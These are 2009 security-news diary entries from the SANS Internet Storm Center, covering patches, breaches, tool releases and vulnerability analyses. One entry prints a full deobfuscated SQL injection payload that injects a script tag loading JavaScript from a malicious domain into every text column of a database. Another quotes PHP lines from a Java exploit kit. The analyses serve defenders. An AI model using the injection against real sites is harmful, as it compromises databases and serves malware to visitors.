Published: 2009-07-31

Adobe Patch is out

It looks like today will be patch day for a lot of folks.  It appears that  Adobe has released the patch for the Thanks to all of our readers that Abobe Bulletins that Handler Mark posted yesterday and Handler Bojan posted on July 23rd.



The patches can be downloaded from Adobe's update site.

Thanks to all of our reader's that have notified us of the availability of the patch.

Deb Hale Long Lines, LLC


Published: 2009-07-31

The iPhone patch is out

Just what we have been waiting for - the patch is out.  We have received confirmation that the patch has been released by Apple to fix the SMS vulnerability in the iPhone OS.  It looks like the patch has to be downloaded from Apple iTunes.  From the Installation notes:

" iTunes will automatically check Apple's update server on its weekly
schedule. When an update is detected, it will download it. When the
iPhone is docked, iTunes will present the user with the option to
install the update. We recommend applying the update immediately if
possible. Selecting "don't install" will present the option the next
time you connect your iPhone."


The information indicates that it may take up to a week for the automatic update process to pick up the patch. They indicate that you can obtain the update manually via the "Check for Update" button in iTunes.  For more information see Apple's support site.


Deb Hale Long Lines, LLC


Published: 2009-07-31

Google Safe Browsing

Last night one of our long time readers sent me an email that had a link to a Google Safebrowsing Diagnostics page for the my AS number. I was quite surprised when I opened the link and there plain as day were 2 of our customer's websites that had been Glumbar'ed.  Both of these had been previously discovered via an audit of our logs. In both cases I took the domains offline and contacted the customers. 

It is amazing the tools that are available on the web now to help you watch what is happening on your network. As part of my responsibility as the Security Administrator for my company I handle all of the abuse complaints.  I can tell you that, some weeks, is no easy task.  I have had weeks where all I got done was counseling customers on the use of Anti Virus/Malware protection and explaining why it is important to get their computer cleaned up.

I had one IP this week that I had received several abuse reports for.  I tracked down the customer and called him.  He told me he did not have an anti-virus program, anti-spyware program or firewall. He said he didn't need them, that he only visits safe websites.  I spent a bit of time on the phone with him and felt that I was not going to be able to convince him that there are no "safe websites".  I hung up from talking to him feeling like I had lost this one.  A short time later my phone rang, it was him eating humble pie.  He apologized, said that it was his computer and that he was going to format and reload the computer and he ABSOLUTELY was going to put some protection on the computer.

The tools that are available today can make things so much easier if you find and use them.  I have signed up for FBL's for as many ISP's as I can find. I have signed up for Microsoft's SDND reporting system, Spam Cop reports, as well as others. I check my domains on Trusted Source and Sender Base and try to stay on top of it. I monitor my ip's on our DShield site to see what you folks are submitting.  Sometimes it feels like a full time job.

I keep telling myself, if we all work together we can make this Internet - the World Wide Web a better, safer place for all of us.  I would like to hear about the tools you are using.  Anything that helps you manage your network better please let us know.


 Deb Hale Long Lines, LLC


Published: 2009-07-31

Don't forget to tell your SysAdmin Thanks

I had totally forgotten that this is indeed a special day!  A holiday of sorts for me and all Sysadmin's around the world. A day we all should have taken off.  (Well maybe not..  If we all took a day off who would keep things running.)

Anyway, today is Sysadmin Appreciation Day, a day that employees in every company all around the world should give a big thank you and a pat on the back to all of their nerds and geeks who keep their systems running smoothly. 


As the article says SysAdmin's get no respect 364 days a year.  Most companies don't even realize we exist until something goes wrong. (And hopefully that is not very often).  Humm - the article also says that we will be "showered with expensive sportscars and large piles of cash".  (I guess I better go track down the boss so that he doesn't have to carry that large pile to me).

In all seriousness, I for one thank all of my fellow admins - whether they work at my company with me, or as a fellow handler, or you, one of our ardent faithful.  Thanks for all you do everyday.  I know what a thankless job this can be.  No one really understands (nor do they want to understand) what we do.  They just want things to work when they need them and they don't want to hear the excuses or the challenges we face.  

So consider this a pat on the back to all of you.  

I want to thank one of the Customer Service Rep's from my company for sending this article with a big "thanks for what you do" to me and the other geeks and nerds in the company.  We can always count on Bob for a Kudo's.

Have a good day to all. Enjoy those big sports cars and all that cash.


Deb Hale Long Lines, LLC


Published: 2009-07-30

iPhone Hijack


We received some information today about a bug in the iPhone OS that may cause some pretty significant problems.  An article was published a couple of days ago that on a couple of well known cyber researchers are going to discuss at the Black Hat Conference this afternoon.  Charlie Miller - one of the researchers urges iPhone users to turn off you iPhone immediately if you get a text message with a single square character.  Miller says "that small cipher will likely be your only warning that someone has taken advantage of a the bug".

Miller says that Apple was notified of the vulnerability a month ago and to this date a patch has not been released. So for those of you with iPhones...  Be diligent, watch for any unusual text message and turn off the device quickly.  For more information take a look at the article in Forbers Online at:


Many thanks to our readers Jason and Ken for notifying us about this article.



Deb Hale Long Lines, LLC


Published: 2009-07-30

Happy patching day

With the DNS issues, Microsoft OOB patch and the Flash issue a couple of other things may have slipped your attention.  So whilst you are applying the MS patches keep in mind that there are a few more that may need applying in the near future.

Adobe has three bulletins out at the moment.  The Flash issue, flash in IE and Shockwave.  The flash patches should be hitting the street on the 31st a Shockwave upgrade is already available (more info here http://www.adobe.com/support/security/ ).

As mentioned in Bojan's diary entry  the Internet Systems Consortium has a fixed version of bind available on their site.  so make some time to upgrade that as soon as you can (of course after testing).

Cisco also had an advisory out this week Advisory ID: cisco-sa-20090729-bgp.  There are two issues that affect certain version of the IOS that allow 4 byte AS numbers and have BGP enabled.  Both issues will cause the device to reload.  More details are here. Updates are available.

Another Cisco advisory earlier this week deals with their wireless LAN controllers which has four issues, three denial of service attacks using malformed requests using HTTP, HTTPS or SSH.  The fourth is a malformed request which allows you to own the controller and thus the wireless network.  If you are running these devices, patch. More info is here.

There are no doubt many, many more, but these should be near the top of your list.  So if you are having fun at Blackhat and/or Defcon, make sure junior is on top of it. 

Flash update is out already,  Adobe Reader is still to come. 

Mark - Shearwater



Published: 2009-07-29

BIND 9 DoS attacks in the wild

Earlier today Marc posted a short diary about a vulnerability in the Internet Systems Consortium's BIND 9 (all versions). As you almost certainly know, BIND is the most popular DNS service application running on majority of DNS servers today – and DNS is one service that we *really* need.

As the DoS attacks have been seen in the wild, and simple scripts that can be used to reproduce the attack are also easily available, this is not really surprising.

I wanted to draw your attention to this vulnerability (if you are running a BIND DNS server) – although the vulnerability exists in the dynamic update feature of BIND, even installations that have dynamic updates disabled are affected! This makes this vulnerability especially dangerous.

Only servers hosting master zones are vulnerable though, so even if the master DNS servers are down, all slaves should still continue to work (I'm not sure what happens if those slaves are masters for some other zones and they are subsequently taken down).

No workarounds exist – you might be able to create some firewall rules that will drop these packets though. In any case, it is recommended to upgrade your BIND DNS servers urgently from https://www.isc.org/node/474



Published: 2009-07-29

Increasing number of attacks on security sites

In last couple of weeks we have been all witnesses of multiple compromises of (in some cases) pretty high profile web sites (and other servers). Today there was another victim of such a compromise, a well known security company.

The group which purportedly compromised most of these servers released their e-zine, named ZF0 (Zero For Owned). The e-zine is full of articles that show a lot of details that the group gathered from the compromised servers – the shown logs definitely confirm that this group managed to compromised all these servers as there was no other way to obtain the information pasted in the e-zine.

After going through all articles, it is still not possible to say how they managed to compromise the servers – I know that there was a lot of FUD about the OpenSSH 0-day exploit. However, even if such thing exists, it is impossible to say if they used it or not.

I spent some time going through the articles and in some cases it appears that the attackers managed to compromise the hosting server, through which they owned all other hosted web sites. This is, indeed, a very viable option since we have been witnesses of such cases for many times. The e-zine authors actually even mention this, to quote them: "So if a site on a shared host is being tested, just because site1.com is "secure" that does NOT in anyway mean that the server is secure, because site2.com could easily be vulnerable to all sorts of simple attacks.". This is very true – I wrote a diary about a very similar attack back in 2007 (see the diary Mass website hosting = mass defacements at http://isc.sans.org/diary.html?storyid=3078).

The issue here is that it can be very difficult to properly limit what each hosted web site and/or account can do in order to protect other customers on the same server. There were also cases when attackers simply bought a web hosting package (they can easily get it for $10 with a stolen credit card) and the web hosting company put their web on a server shared with other, high profile web sites. Of course, in this case, the attacker's job is much easier since in some cases they already have a relatively limited shell access to the server!

So what can we do to protect ourselves? As always, make sure that you remove any application that is not necessary and keep needed applications up to date, together with the operating system. If you use services such as SSH make sure that you use SSH keys, as well as limit access to only trusted IP addresses if possible. I would like to remind everyone to password protect their SSH keys – the worst case scenario is if an attacker gets access to one of your accounts and then just jumps through other (often internal) sites because you had those SSH keys in the open.

Finally, I hope that some of the high profile security sites that have been hit will be able to analyze the attacks and share some useful information about how the attackers got in.



Published: 2009-07-29

BIND 9 Issue

The Internet Systems Consortium announced a DoS condition in BIND 9.  Details are on their web site.  There are proofs of concept available online for those with good searching skills.

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2009-07-28

Twitter spam/phish

Ben wrote in that: "There's a new worm going around Twitter.  Victim feeds it her username and password to see "whos (sic) stalking you on twitter", TwitViewer shows her 200 randomly selected users (even if the account has just been created and therefore almost certainly hasn't been viewed before), then posts a link to itself on her Twitter stream."

At the moment the twitterview . net domain is not resolving.

Adrien de Beaupré
Intru-shun.ca Inc.



Published: 2009-07-28

MS released two OOB bulletins and an advisory

Microsoft has released two Out of Band (OOB) bulletins and one advisory. The security advisory (973882) relates to issues discovered in Microsoft’s Active Template Library (ATL) which is included in Visual Studio. The first bulletin (MS09-035) describes how ATL is used, and some of the code within it that can lead to memory corruption information disclosure, and creation of object instances disregarding set security policy. A number of third party software packages will also have to be updated to reflect this change. The second bulletin (MS09-034) is a defense in depth mitigation for potential bypass of ActiveX killbits, commonly used to mitigate other vulnerabilities. The impact of a user viewing an evil web page is arbitrary code execution. Related CVE entries are:

ATL Uninitialized Object Vulnerability - CVE-2009-0901
ATL COM Initialization Vulnerability - CVE-2009-2493
ATL Null String Vulnerability - CVE-2009-2495

Memory Corruption Vulnerability - CVE-2009-1917
HTML Objects Memory Corruption Vulnerability - CVE-2009-1918
Uninitialized Memory Corruption Vulnerability - CVE-2009-1919

Microsoft's investigation into MSvidctrl(MS09-032) apparently found the underlying issue in the ATL library, which is addressed in the bulletin and patches. More information will be available tomorrow at BlackHat . Here is a teaser advanced preview of the IE ActiveX killbit bypass being presented tomorrow: http://www.hustlelabs.com/bh2009preview/

Microsoft had provided an advance notification of these releases 24 July 2009. We covered it here.


Adrien de Beaupré

Teaching SANS Cutting-Edge Hacking Techniques in Ottawa this September.


Published: 2009-07-28


Yes Yet Another Massive Credit Card Breach Alas, this time Network Solutions. They appear to still be in the process of investigating and customer notification. More information available from them here. The breach happened some time before 12 March 2009, and was discovered some time after 08 June 2009. Thousands of merchants and almost 600,000 credit cards may be affected.

If you have additional comments or information please contact us!

Adrien de Beaupré
Intru-shun.ca Inc.


Published: 2009-07-27

Filemon and Regmon are dead, long life to Procmon!

Frequent reader and contributor, Kevin, called our attention about a new update to the Sysinternals tools announced right before the weekend. The most significant piece of information is that End of Life for Filemon and Regmon is September 1, 2009. Yes, in about one month, two of the most widely used tools for Windows malware analysis and system inspection will say goodbye. The good news is that Procmon (v2.5 at this point) is the natural replacement:

Process Monitor is the replacement for Filemon and Regmon and is much more advanced and scalable than its predecessors. We only aim to make Sysinternals tools work on Windows XP and higher,  we’ve decided that it’s time to retire these venerable utilities that were born in the early days of Sysinternals (then NTinternals) back in 1996. So that you have a chance to say goodbye, we’re announcing now that they will be removed from the site on September 1.

Time to update your tool analysis arsenal! Besides that, it is a good time to check Mark's recent "Pushing the Limits of Windows" series of blog posts, exploring the boundaries of fundamental resources in Windows.

Raul Siles


Published: 2009-07-27

New Hacker Challenge: Prison Break - Breaking, Entering & Decoding

Hey, ISC readers and challenge fans! Ed Skoudis has posted one of his famous and always
entertaining security challenges over at EthicalHacker dot Net.

This time I got the opportunity to write it, and it has been a lot of fun! I hope you
enjoy participating on this challenge as much as I've enjoyed writing it. Thanks Ed!
The "Prison Break - Breaking, Entering & Decoding" challenge is based on the Prison
Break TV show, adapted to a hacking scenario. It has been designed to test your
penetration testing skills and make you think about the associated defensive

As usual, prizes will go to the best technical and creative answers, as well as one
random draw winner. You can check Ed's previous challenges on his website.

This can be a good entertainment after the common depression following the BlackHat &
Defcon conferences.

Raul Siles


Published: 2009-07-26

New Volatility plugins

There isn't a lot of activity on the Internet Storm Center radar at the moment, I suppose it is, as the saying goes, the calm before the storm.  While we all wait to hear what sort of new "fun" comes out of Vegas this week from BlackHat/DefCon, I wanted to point out that, last week, Michael Hale Ligh has updated his awesome usermode_hooks and malfind plugins for Volatility that I told you about in May and released 4 additional ones.  You can read all about them from the author here.  Now I guess I'll need to work a couple more of them into my automated malware analysis platform.


Jim Clausing, jclausing --at-- isc dot sans dot org

For those of you in (or who know someone in) central Ohio that might be interested, I'll be mentoring SEC 508: Computer Forensics, Investigation, and Response, here this fall, check out www.sans.org/mentor/details.php?nid=19458


Published: 2009-07-24

Microsoft Out of Band Patch

Several readers have pointed out that Microsoft has provided notification of an Out-of-Band patch to be released this coming Tuesday, July 28th.  The advisories indicate a fix for Visual Studio and for Internet Explorer.

More info at:



-- Rick Wanner - rwanner at isc dot sans dot org


Published: 2009-07-23

Missouri Passes Breach Notification Law: Gap Still Exists for Banking Account Information

Earlier this month, Missouri passed a breach notification law as part of on omnibus package of laws under HB 62, It's the a few paragraphs after the law that bans beer-bongs on rivers in Missouri [1]. It is a slightly different variant than most other breach laws but not by much. Here is a brief synopsis of the law with the usual disclaimers [2]. There is still the encryption immunity (if you lose encrypted data you don't have to report). Other than that, it defines private information as name plus and of the following:

  • Social Security Number
  • Driver's License Number
  • Health Information
  • Insurance Information
  • Financial Account Number (with whatever other information gives access to account)
  • "Unique Electronic Identifier" or Routing Code (with whatever other information gives access to account)

I'm not entirely sure what they mean by Unique Electronic Identifier and I don't think by Routing Code they mean ABA Routing Number used for bank accounts.  Regardless, in all cases it still requires name with all those categories for a "reportable" even to occur. For the most part, this makes sense. There is one exception, checking (or other transaction) account information.

While credit cards do have name verification, the ACH system does NO NAME VERIFICATION. If I have your checking account and routing number (which is essentially public), that's all I need to take money out of your account.  That's it, no name, no address, no other information needed. This is a growing problem because the criminals know how easy it is to take money from these accounts and it is becoming a growing target.  A local merchant where I live was compromised and I happened to be one of the lucky ones that paid by check.  First I heard about it was some non-descript information in the news.  Second I heard about it was when I started seeing people buying $100 prepaid cards out of my account.

That vendor was NOT REQUIRED to notify me that they lost my account information because they only went for checking account # and routing #.  As a result, first I knew about it was when money went missing.

Unlike credit cards, checking accounts are painful to close. You can't close them if transactions (even fraudulent) are pending. Unlike credit cards, you have to send in a notarized form within 60 days to get your money back (maybe). And then there is changing all those automatic withdrawals you may have set up. For instance, the US Department of Education Student Loans Department takes 2-3 MONTHS to update automatic payment information (you know, the same people that use the SOCIAL SECURITY NUMBER as the ***USERNAME***[3] for all accounts).

Long story short, pay attention to your bank account information. You have to respond more or less immediately if you notice fraud.  What seems to be typical is seeing a transaction that says DEBIT CARD 800-XXX-XXXX, but that is actually an ACH transaction. (Debit card is a more-or-less credit card transaction and processed over that infrastructure. ACH is a direct deposit or withdrawal using the account information not the debit card information).  If you see those transactions, start the investigation process to get your money back but immediately close the account and open a new one.  If your bank pushes back, get a new bank.

And tell your state legislator to fix the law so bank account number and routing number WITHOUT name are reportable under breach notification laws.

John Bambenek
bambenek at gmail /dot/ com

Footnotes -

[1] - Now I gotta change my summer vacation plans... **shakes fist**

[2] - This isn't legal advice and if you take what you read on the internet as actual legal advice, you deserve whatever really bad thing happened to you. 

[3] - **Faceplams**


Published: 2009-07-22

DD-WRT Vulnerability

Paul wrote in to let us know about a new vulnerability in DD-WRT that was being reported in the Register at http://www.theregister.co.uk/2009/07/21/critical_ddwrt_router_vuln/.

DD-WRT runs on routers by Linksys, D-Link Buffalo, ASUS and well as other routers.  The complete list can be found at http://www.dd-wrt.com/wiki/index.php/Supported_Devices

This vulnerability will allow an attacker to run programs with root priviledges on a vulnerable router.

More information can be found on the DD-WRT Forum at http://www.dd-wrt.com/phpBB2/viewtopic.php?t=55173&postdays=0&postorder=asc&start=0

Christopher Carboni - Handler On Duty


Published: 2009-07-22

Vulnerability in dhclient - Check Your Vendor For Patches

US-Cert released VU#410676 which deals with a vulnerability in the ISC DHCP dhclient application.

"The ISC DHCP client code (dhclient) contains a stack buffer overflow in the script_write_params() method. dhclient fails to check the length of the server-supplied subnet-mask option before copying it into a buffer. According to ISC, the following versions are affected:

DHCP 4.1 (all versions)

DHCP 4.0 (all versions)

DHCP 3.1 (all versions)

DHCP 3.0 (all versions)

DHCP 2.0 (all versions)"

Red Hat (no version specified) and Ubuntu are known vulnerable.

More details are available at http://www.kb.cert.org/vuls/id/410676 , https://www.isc.org/node/468 and http://vrt-sourcefire.blogspot.com/2009/07/dont-read-this-post.html

Christopher Carboni - Handler On Duty


Published: 2009-07-22

YA0D (Yet Another 0-Day) in Adobe Flash player

Well, it looks like the last two weeks have definitely been marked by multiple 0-day exploits actively used in the wild.
The last one exploits a vulnerability in Adobe Flash player (versions 9 and 10) as well as Adobe Reader and Acrobat 9.1.2. Besides being a 0-day there are some other interesting things about this exploit.

First, several AV companies reported that they detected this 0-day exploit in PDF files, so at first it looked like an Adobe Reader vulnerability. However, the vulnerable component is actually the Flash player or, better said, the code used by the Flash player which is obviously shared with Adobe Reader/Acrobat. This increases the number of vectors for this attack: the malicious Flash file can be embedded in PDF documents which will cause Adobe Reader to execute it OR it can be used to exploit the Flash player directly, making it a drive-by attack as well.

And indeed, when tested with Internet Explorer and the latest Flash player (version 10), the exploit silently drops a Trojan and works "as advertised". Another interesting thing I noticed is that the Trojan, which is downloaded in the second stage, is partially XOR-ed – the attackers probably did this to evade IDSes or AV programs scanning HTTP traffic. At the moment, the detection for both the exploit and the Trojan is pretty bad (only 5/41 for the Trojan, according to VirusTotal).

It appears that even when JavaScript support is disabled in Adobe Reader that the exploit still works, so at the moment there are no reliable protection mechanisms (except not using Adobe Reader?). Regarding Flash, NoScript is your best help here, of course.


Published: 2009-07-22

Firefox 3.0.12 is Available

For those Firefox users which have not upgraded to 3.5.x, Firefox 3.0.12 is now available for Windows, Mac, and Linux for free download from http://www.mozilla.com/en-US/firefox/all-older.html.

Firefox 3.0.x will be maintained with security and stability updates until January, 2010. All users are encouraged to upgrade to Firefox 3.5 by downloading it from http://firefox.com/ or by selecting "Check for Updates..." from the Help menu when using Firefox 3.0.12.

Christopher Carboni - Handler On Duty


Published: 2009-07-20

Wireshark Release 1.2.1

One of our readers, Tommy,  highlighted that the developers of Wireshark have released a bug fix release bringing the protocol analyser to version 1.2.1.

The release notes highlight that a number of the protocol dissectors have been fixed to address some issues:

  • The IPMI dissector could overrun a buffer - affected: 1.2.0
  • The AFS dissector could crash - affected: 0.9.2 to 1.2.0
  • The Infiniband dissector could crash on some platforms - affected: 1.0.6 to 1.2.0
  • The Bluetooth L2CAP dissector could crash - affected: 1.2.0
  • The RADIUS dissector could crash - affected: 1.2.0
  • The MIOP dissector could crash - affected: 1.2.0
  • The sFlow dissector could use excessive CPU and memory - affected: 1.2.0

Given that some of these issues have been around since pre 1.0, could be a good time to update your installed version.


Published: 2009-07-19

Mozilla Comments on Firefox 3.5.1 issue

Yesterday we published a diary about a new vulnerability and POC that affected Firefox 3.5.1.  Today we received a note from the good people at Mozilla with some clarification.  Here is what they said:

We do not believe this is any kind of boundary condition, but a
non-exploitable denial-of-service due to memory exhaustion.

Our bug for reference:

Thanks for the update, Reed!

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2009-07-18

From the Mailbag - taking Oracle and it's CPU to task

As a follow up to a previous Diary (Oracle Black Tuesday) we had a Storm Center participant, Brian, offer some comments about Oracle's CPU.

Brian said "Regarding your comment on Oracle Black Tuesday, I have several observations that may benefit other ISC readers.

The exposure of Oracle's CPU goes far beyond the database as they have expanded significantly into many other software, including key security management software (Identity Management/Authentication).

As Oracle repackages several open source products, administrators are stuck choosing between security and support.  For example, the recent patches to Apache's http server can't be applied because Oracle repackages that product as Oracle HTTP Server.  Apply the patches and you're no longer supported.

Oracle has got to find a way to make the CPU analysis easier.  The decision matrix an administrator has to go through is obscene.  I conducted an analysis of a recent CPU for our environment and it took me over a week solid to determine what the exposure was and what the pre-requisites for the CPU patches were.  And that doesn't include the support time and outages because Oracle's documentation was incorrect.  As a user community, we need to push Oracle to make this process simpler (think up2date or YaST or even Windows Update)

Thanks for the sending in your thoughts Brian. Banding together and working with the vendor is always effective. So if there is already a group of customers that have banded together to work effectively with Oracle, let us know some of the groups specifics and I'll update the diary.

In addition to the previous Diary's comment about the lack of substantial vulnerability information for non-customers, it should be noted that Oracle's public Critical Patch Update Advisory - July 2009 has a section called the Patch Availability Table and Risk Matrices, each products Matrix provides CVSS information that can help both customers and non-customers prioritize Oracle CPU's for deployment.


Published: 2009-07-18

Chrome update contains Security fixes

On Thursday, July 16, Google Chrome was released, it fixed what Google calls a Critical severity vulnerability, Memory corruption in the browser process, and a High severity vulnerability, Heap overflow with Javascript regular expressions. They report the vulnerabilities were identified by the  "Google Chrome security team".

Stable, Beta update: Bug fixes


Published: 2009-07-18

Vulnerability in FireFox 3.5.1 confirmed, exploit PoC, no patch

Various analysts and sites have recently confirmed a vulnerability is present in FireFox 3.5.1 that has had exploit PoC released. When exploited, the vulnerability can lead to system compromise or induce a DOS. No Patch is available.

Mozilla Firefox 3.5 Unicode Data Remote Stack Buffer Overflow Vulnerability



Published: 2009-07-17

Replacing Phishers with a Small Shell Script: Jakarta Bombing Malware

Almost on cue, with the news of the bombing in Jakarta, the bottom-feeders of the black-hatters have started to put up Jakarta-related phishing schemes. The first wave seems to be more of the fake anti-virus variety and Threat Expert has a write up on that malware. Nothing seems particularly interesting on it.

It would be a novel invention (but probably unworkable) if domain registrars could simply halt registrations for "crisis-related" domains to slow this kind of thing down (and the same for web advertisement services like Google).  A list of hostile domains is on its way to various security researcher lists, but keep an eye for Jakarta-related phishing attacks.

John Bambenek
bambenek /at/ gmail dot com


Published: 2009-07-17

Cross-Platform, Cross-Browser DoS Vulnerability

G-SEC posted an advisory of a nifty little vulnerability that affects most browsers on most platforms, including mobile devices (i.e. iPhones) and gaming consoles. In essence, it requires a malicious webpage to call the select() function with a large integer. For the most part, this can allocate up to 2 GB of RAM and bring most systems to a grinding halt.  My favorite is the Konqueror / Ubuntu combination in which a large amount of memory is allocated and then Ubuntu starts killing random processes. Hot.

Some patches are out, some devices would strike me as non-trivial to patch.  Impact is minor and I doubt there will be wide-spread exploitation of this because of the inability to execute code locally.  Worst case, browser crashes or system reboots.  It does seem like the kind of thing that ought to have been caught earlier.

Of particular note, IE is exposed up to IE9 [1].

John Bambenek
bambenek /at/ gmail dot com

[1] This is what the advisory says, I'm not sure that makes much sense.


Published: 2009-07-17

A new fascinating Linux kernel vulnerability

Source code for a exploit of a Linux kernel vulnerability has been posted by Brad Spengler (Brad is the author of grsecurity). I have to tell you right now – this was one of the most fascinating bugs I've read about lately.

Why is it so fascinating? Because a source code audit of the vulnerable code would never find this vulnerability (well, actually, it is possible but I assure you that almost everyone would miss it). However, when you add some other variables into the game, the whole landscape changes.

While technical details about this are a bit complex, generally what's happening can be easily explained. The vulnerable code is located in the net/tun implementation. Basically, what happens here is that the developer initialized a variable (sk in the code snippet below) to a certain value that can be NULL. The developer correctly checked the value of this new variable couple of lines later and, if it is 0 (NULL), he just returns back an error. The code looks like this:

struct sock *sk = tun->sk;  // initialize sk with tun->sk

if (!tun)
    return POLLERR;  // if tun is NULL return error

This code looks perfectly ok, right? Well, it is, until the compiler takes this into its hands. While optimizing the code, the compiler will see that the variable has already been assigned and will actually remove the if block (the check if tun is NULL) completely from the resulting compiled code. In other words, the compiler will introduce the vulnerability to the binary code, which didn't exist in the source code. This will cause the kernel to try to read/write data from 0x00000000, which the attacker can map to userland – and this finally pwns the box. There are some other highly technical details here so you can check your favorite mailing list for details, or see a video with this exploit on YouTube at http://www.youtube.com/watch?v=UdkpJ13e6Z0. Brad was able to even bypass SELinux protections with this and LSM.

The fix for this is relatively easy, the check has to be done before assigning the value to the sk structure.
Fascinating research that again shows how security depends on every layer, and how even very expensive source code audit can result in missed vulnerabilities.



Published: 2009-07-17

Firefox 3.5.1 has been released

Thanks to all those who have sent in submissions overnight to alert us to the release of Firefox 3.5.1.

The update contains a single fix for the JIT issue contained in our earlier diary.

Mozilla have the details of the fix contained in their security advisory.

If you are a Firefox 3.5 user, update now. And remember, if you applied the world around by disabling the JIT in about:config, remember to turn it back on!

Steve Hall



Published: 2009-07-16

Nmap 5.0 released

One of the must have tools for every person doing anything related to IT security is definitely Nmap (I mean, which other tool, besides an SSH exploit Trinity used as well (and that wasn't a fake SSH exploit like the one released couple of days ago)). The Nmap developers work hard on this latest version which includes some very cool things like the Nmap Scripting Engine (NSE) which we even used to detect machines infected with the Conficker worm.

There are a lot of other neat new features and improvements, so don't wait and go to http://nmap.org/5/ to download your copy of Nmap.



Published: 2009-07-16

OWC exploits used in SQL injection attacks

As we thought, it was just a matter of time before more attackers start exploiting the still unpatched Office Web Components vulnerability.

While a day ago reports of exploits for this vulnerability were still a bit rare, yesterday Ken Hoover sent a log of an SQL injection attempt to his web site. The SQL injection attempt looks very much like the one we've been seeing for month – the attacker blindly tries to inject obfuscated SQL code:

SET @S=CAST(0x44004500430…F007200 AS NVARCHAR(4000));

After deobfuscation of the CAST function input, the following SQL code is revealed:

DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=hxxp://f1y.in/j.js></script>''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

As you can see, they are injecting a script code pointing to f1y.in, which is a known bad domain. This script contains links to two other web sites (www.jatrja.com and js.tongji.linezing.com) serving malicious JavaScript that, besides exploits for some older vulnerabilities, also include the exploit for the OWC vulnerability.

The exploits end up downloading a Trojan (of course, what else) which currently has pretty bad detection (VT link) – only 15 AV programs detecting it, luckily, some major AV vendors are there.

If you haven't set those killbits yet, be sure that you do know because the number of sites exploiting this vulnerability will probably rise exponentially soon.



Published: 2009-07-16

Changes in Windows Security Center

An ISC reader wrote in about a change that occurred this month with the Windows Security Center (WSC) where Microsoft expired the grace period used by vendors to report AV, firewall or anti-spyware status to the WSC. The new WSC API used to report to the WSC was supposed to expire in September 2009. The new API is a result of an interface change introduce in Windows Vista SP1 and part of Windows 7, replacing the API that was part of Vista's original release.

If you are seeing a red shield in the bottom right corner, your Malware Protection tab maybe indicating your AV "is on but it is reporting its status to Windows Security Center in a format that is no longer supported. Use the program's automatic updating feature, or contact the program manufacturer for an updated version".

The grace period to update to the new API to report the correct status to the WSC in Vista SP1 has expired earlier than anticipated, causing confusion on whether your vendor security software is protecting your PC.

This does not mean your AV, firewall or anti-spyware is not working and protecting your system but that it is no longer able to report correctly its status through the WSC. Monitor the WSC status regularly to ensure your AV, firewall or anti-spyware are updated on schedule and functioning properly.

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot org

Teaching Comprehensive Packet Analysis in Ottawa, ON this coming September


Published: 2009-07-15

Make sure you update that Java

One of our readers, Tom Ueltschi, sent an e-mail with details about an exploit that is exploiting a Java vulnerability. While such exploits are not rare, this particular exploit targeted a vulnerability that was published in December 2008 by iDefense, and a reliable exploit became publicly available couple of months ago, in April this year.

However, it took some time for the bad guys to start using this exploit in their attack kits. The vulnerability exists in Java JRE release 6, in update versions lower than 13 and release 5, update versions lower than 18.

The vulnerability exists in the Pack200 compression method, which is used to compress Jar files. The compression method is called when reading a Pack200 compressed file – the exploit creates an Applet which downloads a special crafted Pack200 compressed file. It's interesting how the attackers completely copied the publicly available exploit (they even used the same file names!), so they end up using an HTML file that creates the Applet, which further calls a PHP script called e.php that is needed to correctly set the Content-Encoding header:


$fp = fopen('e.pack.gz', 'rb');

header('Content-Encoding: pack200-gzip');



The Applet contains shellcode, which gets executed if the vulnerability is successfully exploited – as you can guess it downloads a Trojan which, luckily, has *some* detection (VT link) with some major names still missing it.
After checking the malicious web site, it became obvious that the exploit has been integrated with an attack kit, so we can expect this to become more common now.

Finally, I'd like to remind every to double check that you have the latest Java installed on your machine (and those older versions removed). Also, don't forget about those nice addons such as NoScript which can limit your exposure by allowing Java or JavaScript to execute only on trusted web sites and not by default.



Published: 2009-07-14

Oracle Black Tuesday

Oracle's quarterly patch release day was today as well.

Oracle keeps details restricted to customers with an account so we only have access to the overview they publish themselves:


Best approach in my experience is to walk through the list with those managing the products such as DBAs and get an action plan in place.

Swa Frantzen -- Section 66


Published: 2009-07-14

ISC DHCP client updated

The Internet Systems Consortium released patches to their dhcp implementation.

The patches fix a stack overflow in dhclient (the dhcp client) CVE-2009-0692.

Expect a large number of unix and linux distributions as well as third party solutions using dhcp to need an update in the coming days. US-CERT tracks vendors in their VU #410676.

Swa Frantzen -- Section 66


Published: 2009-07-14

Firefox new exploit

This is one of the strangest bugs beings discussed in Firefox that I've ever followed.

For Firefox we usually get an open and direct response. Yet this feels relatively unconfirmed and in the shade. So what's up here?

Feel free to contact us. Please no links to media rehashing the same all over we're looking for first hand sources confirming or denying.

Anyway, for those in doubt or fear: you could install and use NoSCript: that should remove the threat of that exploit completely.

Swa Frantzen -- Section 66


Published: 2009-07-14

Infocon returning to green from MS Advisory 973472

After the rush of the new vulnerability being published, exploits in the wild, and malware being distributed it is time to return the Infocon to normal status. Hopefully it has served its purpose of raising awareness of the Vulnerability in Microsoft Office Web Components Control Could Allow Remote Code Execution CVE-2009-1136 and Microsoft advisory 973472.



Published: 2009-07-14

Microsoft July Black Tuesday Overview

Overview of the July 2009 Microsoft patches and their status.

# Affected Contra Indications Known Exploits Microsoft rating ISC rating(*)
clients servers
MS09-028 Multiple vulnerabilities exist in DirectX and allow for arbitrary code execution with the rights of the logged on user.
Replaces MS08-033 and MS09-011.

KB 971633

Active exploitation of CVE-2009-1537

Addresses SA971778

MS09-029 Multiple input validation vulnerabilities allow for arbitrary code execution with the rights of the logged on user.
Replaces MS06-002.
.eot (Embedded OpenType)

KB 961371 No known exploits Severity:Critical
Critical Important
MS09-030 An input validation error allows arbitrary code to be executed with the rights of the logged on user.

KB 969516 No known exploits Severity:Important
Critical Important
